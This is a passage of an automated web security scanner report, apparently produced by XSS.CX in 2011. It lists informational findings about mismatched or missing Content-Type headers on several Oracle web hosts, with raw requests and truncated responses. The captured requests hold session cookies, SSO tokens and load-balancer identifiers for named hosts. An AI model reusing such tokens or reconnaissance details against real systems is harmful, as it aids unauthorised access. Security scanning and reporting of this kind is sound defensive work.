For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
17.1. https://campus.oracle.com/campus/HR/images/bullet2.png
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://campus.oracle.com
Path:
/campus/HR/images/bullet2.png
Issue detail
The response contains the following Content-type statement:The response states that it contains a PNG image . However, it actually appears to contain a GIF image .
Request
GET /campus/HR/images/bullet2.png HTTP/1.1/campus/HR/zealand-apply.html;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551
Response
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-ServerContent-Type: image/png .33.f3..3..3..3..f.3f.ff..f..f..f....3..f..............3..f..............3..f.............33.3f.3..3..3..3.33333f33.33.33.33.f33f3ff3.f3.f3.f3..33.3f.3..3..3..3..33.3f...[SNIP]...
17.2. https://shop.oracle.com/pls/ostore/f
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/f
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=UTF-8 HTML . However, it actually appears to contain script .
Request
GET /pls/ostore/f?p=700:320:7881107130450135::NO:320:: HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:cart:7881107130450135;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B
Response
HTTP/1.1 200 OK-10gContent-Type: text/html; charset=UTF-8 .LoginForm.submit();"><FORM ACTION="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login" METHOD="GET" ...[SNIP]...
17.3. http://solutions.oracle.com/img/opn_sc7.css
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://solutions.oracle.com
Path:
/img/opn_sc7.css
Issue detail
The response contains the following Content-type statement:The response states that it contains CSS . However, it actually appears to contain HTML .
Request
GET /img/opn_sc7.css HTTP/1.1.com/home/basic_search;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000
Response
HTTP/1.1 200 OKContent-Type: text/css -10g OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=86400+0;age=5867;ecid=83490035471,0),helvetica,sans-serif;}...[SNIP]...
18. Content type is not specified
previous
There are 4 instances of this issue:
Issue description
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
18.1. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/moc_lib.js
Request
GET /mysso/sso_loginui/moc_lib.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nsd_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/------------------------//...[SNIP]...
18.2. https://login.oracle.com/mysso/sso_loginui/sso_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/sso_check.js
Request
GET /mysso/sso_loginui/sso_check.js HTTP/1.1/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000
Response
HTTP/1.1 200 OKUS1EaweP001nsc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/.indexOf("Netscape") !=-1);...[SNIP]...
18.3. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/mysso/signon.jsp;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S...[SNIP]...
Response
HTTP/1.1 200 OKUS1EaweP001pGi_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
18.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/index.html;q=0.3
Response
HTTP/1.1 200 OKUS1EaweP001nsI_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
Report generated by XSS.CX at Mon Oct 17 08:13:44 CDT 2011.